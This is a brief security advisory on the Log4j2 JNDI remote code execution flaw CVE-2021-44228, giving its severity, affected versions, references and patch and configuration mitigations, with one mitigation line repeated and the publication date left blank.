New zero-day exploit for Log4j Java library CVE-2021-44228 Exploited in the Wild

Apache Log4j2 impacts versions 2.0 to 2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.

Severity: Critical

Base CVSS Score: 10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Versions Affected: all versions from 2.0-beta9 to 2.14.1

References:

  1. https://www.randori.com/blog/cve-2021-44228/
  2. https://www.lunasec.io/docs/blog/log4j-zero-day/
  3. https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  4. https://logging.apache.org/log4j/2.x/security.html

Mitigations:

Permanent:

Patch Log4j to version 2.15.0 or greater

Temporary:

If your version of Log4j is at 2.10.0 or newer:

  • Set'formatMsgNoLookups=true'

If your version of Log4j is older than 2.10.0 then you can do either of:

  • Modify every logging pattern layout to say '%m
    {nolookups} ' instead of '%m' in your logging config files
  • Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application's or stack's classloading documentation to understand this behavior.

Modify every logging pattern layout to say '%m {nolookups}' instead of '%m' in your logging config files


Published on  and maintained in Cascade.